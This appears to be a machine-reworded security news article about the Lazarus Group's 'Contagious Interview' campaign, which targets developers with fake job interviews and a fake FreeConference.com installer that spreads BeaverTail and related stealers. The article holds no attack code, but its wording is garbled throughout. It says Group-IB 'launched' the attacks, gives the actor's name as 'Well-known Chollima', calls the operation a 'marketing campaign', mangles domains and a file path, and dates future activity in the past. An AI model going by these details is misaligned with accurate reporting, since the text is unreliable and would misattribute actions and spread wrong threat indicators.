The North Korean threat actors have exploited a fake Windows video conferencing tool, disguised as FreeConference.com, to compromise developers and conduct a financially motivated operation called Contagious Interview, which involves infiltrating systems through backdoor tactics.
The latest assault wave, launched by Singaporean cybersecurity company Group-IB in mid-August 2024, serves as a further example of threat actors exploiting native installers on Windows and Apple macOS operating systems to distribute malware.
A sophisticated cyberattack, codenamed Contagious Interview, has been linked to the notorious North Korean threat actor, Well-known Chollima, as identified by CrowdStrike under DEV#POPPER.
The initial attack vector involves a fake job interview, luring unsuspecting victims into installing and completing a Node.js challenge that unwittingly downloads the BeaverTail malware, which in turn deploys a cross-platform Python backdoor known as InvisibleFerret, featuring remote control, keylogging, and browser hijacking capabilities.
Some variants of BeaverTail, posing as data-stealing JavaScript malware, have emerged in the form of malicious code typically disseminated through purported technical evaluations during the hiring process.
Malicious actors in July 2024 successfully disguised Windows MSI installer and Apple macOS disk image (DMG) files mimicking genuine MiroTalk video conferencing software, thereby deploying a new version of the malicious malware, BeaverTail.
The most recent findings from Group-IB attribute the marketing campaign to the notorious Lazarus Group, suggesting that the menace actor continues to rely on this particular distribution mechanism, albeit with one key distinction: the installer (“FCCCall.msi”) now masquerades as FreeConference.com rather than MiroTalk.
According to reports, the malicious installer appears to be sourced from a website called freeconference.io, which shares the same registrar with the fake domain mirotalk.web.
According to safety researcher Sharmine Low, Lazarus is also actively seeking out potential targets on various job search platforms, including those comparable to WWR, Moonlight, and Upwork, in addition to LinkedIn.
Following initial outreach, candidates typically proceed to Telegram, where they’re subsequently asked to acquire a video conferencing tool or complete a Node.js-based technical exercise as part of the interviewing process.
As part of ongoing efforts to refine their tactics, threat actors have been observed injecting malicious JavaScript code into cryptocurrency- and gaming-related repositories, a sign that their marketing campaign remains dynamic and adaptable. The JavaScript code, intended for its primary function, aims to fetch the BeaverTail JavaScript code from either the ‘ipcheck[.]cloud’ or ‘regioncheck[.]web’ domain.
Notably, this behavior has recently been brought to light by Phylum, a software supply chain security firm, in relation to an npm package called …, indicating that threat actors are simultaneously exploiting multiple propagation vectors.
Notable changes include the configuration of BeaverTail to extract knowledge from additional cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X, and Exodus Web3, in addition to implementing performance enhancements that utilize AnyDesk’s persistence features.
That is not all. BeaverTail’s capabilities for stealing sensitive information are effectively enabled through a suite of Python scripts, codenamed CivetQ, which can harvest cookies, Internet browser data, keystrokes, and clipboard contents, while also disseminating additional scripts. Seventy-four browser extensions were targeted by the malware.
The malware is poised to pilfer sensitive information from Microsoft Sticky Notes by targeting the application’s SQLite database files located at `%LocalAppDatapercentPackagesMicrosoft.MicrosoftStickyNotes_8wekyb3d8bbweLocalStateplum.sqlite`, where user notes are stored in plaintext.
“Through queries that tap into the database’s vast repository of information, the malicious software is able to extract and illicitly transmit sensitive data stored in the user’s Sticky Notes application.”
As the CivetQ framework takes shape through modularity, it is further underscored that the tools remain actively under development, experiencing steady incremental evolution over recent months.
As Low pointed out, the Lazarus Group has significantly refined its tactics, incorporating cutting-edge tools and innovative strategies to further conceal its malicious activities. As they continue to drive home their message to a wide range of job seekers, their comprehensive marketing push shows no signs of slowing down, with sustained efforts expected through at least mid-2024. Their attacks have become increasingly sophisticated, expanding their reach across even more online platforms.
The U.S. government has disclosed that The Federal Bureau of Investigation has issued a warning about North Korean cyber actors’ increasingly brazen attacks on the cryptocurrency industry, using sophisticated social engineering tactics to steal digital currencies.
The Federal Bureau of Investigation has warned that North Korean cyber threats involve sophisticated social engineering tactics, often targeting individuals with impressive technical expertise. The malicious actors, according to the agency, conduct reconnaissance by scrutinizing potential victims’ online activity on professional networking and job search platforms.
Malicious North Korean cyber groups identify specific decentralized finance (DeFi) or cryptocurrency companies as targets, employing social engineering tactics to deceive multiple employees at these organizations and gain unauthorized access to their networks.
